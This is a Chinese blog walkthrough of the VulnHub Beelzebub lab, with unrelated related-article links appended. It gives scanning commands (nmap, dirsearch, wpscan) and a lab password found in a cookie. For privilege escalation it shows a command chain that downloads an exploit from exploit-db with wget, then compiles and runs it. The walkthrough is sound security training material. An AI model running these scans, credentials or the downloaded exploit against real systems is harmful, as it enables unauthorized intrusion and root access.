当前位置: 首页 > news >正文

vuhub Beelzebub靶场攻略

靶场下载:

下载地址:https://download.vulnhub.com/beelzebub/Beelzebub.zip

靶场攻略:

主机发现:

nmap 192.168.163.1/24

端口扫描:

nmap -p-65535 -A 192.168.163.152

发现没有额外端口。

页面扫描:

dirsearch -u http://192.168.163.152/

挨个登录一下扫到的页面,就两个有用的:

phpinfo.php

/index.php/login/

右键查看源代码

他说把beelzebub进行base64解码

解码出来时一串字符,看别的攻略是要我们拼接到路径后面,然后进行页面扫描

dirsearch -u http://192.168.163.152/d18e1e22becbd915b45e0e655429d487

我们发现这是一个wordpress的cms框架,挨个访问一下扫到的页面:其中有用的有

发现了一个留言板:

F12查看cookie找到了password为M4k3Ad3a1

扫描wordpress漏洞

有密码,但是没账号,账号到哪里找呢?

我们结合之前的信息,这是一个wordpress的cms框架,那么我们可以试着扫描一下有没有框架漏洞。工具webscan

wpscan --url=http://192.168.251.229/d18e1e22becbd915b45e0e655429d487/ --ignore-main-redirect --force  -e --plugins-detection aggressive

扫描出来了两个账号。

挨个试一下,登录ssh,成功登录:

history查看历史命令

发现其中有前辈们提权的步骤,那太好了,我们照着做就行了

wget https://www.exploit-db.com/download/47009
 mv 47009 ./exploit.c
 gcc exploit.c -o exploit
 ./exploit

http://www.dtcms.com/a/324775.html

相关文章:

  • 从零学习three.js官方文档(二)——图元
  • 数据结构2线性表——顺序表
  • Python高阶
  • 企业架构之导论(1)
  • 2025华数杯比赛还未完全结束!数模论文可以发表期刊会议
  • C# 异步编程(并行循环)
  • 内存溢出的原因有哪些,如何排查线上问题?
  • 【Spring Boot刷新上下文核心流程详解】
  • UNIVERSAL IMAGE RESTORATION PRE-TRAINING VIA DEGRADATION CLASSIFICATION
  • 【Python 工具人快餐 · 第 5 份】
  • 1. 电阻选型
  • 云服务器最新版MySQL 安装步骤
  • jdk17下载安装教程【超详细图文】
  • 零基础学习jQuery第二天
  • 在windows安装colmap并在cmd调用
  • json-fortran库的使用
  • TS 编译原理,提供的 API
  • Angular初学者入门第二课——.ts、.d.ts、.state.ts的区别(精品)
  • Perplexity 为特朗普 Truth Social 提供技术支持
  • 深入解析微服务分布式事务的原理与优化实践
  • 极移(Polar Motion):概念、原因、影响及坐标转换计算
  • 下载UOS桌面专业版系统镜像
  • 计算机视觉(CV)——图像相关基本概念
  • 【redis初阶】------redis客户端(1)
  • Node.js面试题及详细答案120题(01-15) -- 基础概念篇
  • Leaflet地图高亮与编辑功能实现
  • 【最后203篇系列】031 构建MCP尝试
  • signed 和 unsigned 类型说明符
  • 嵌套-列表存储字典,字典存储列表,字典存储字典
  • Linux 路由子系统深度分析:框架、实现与代码路径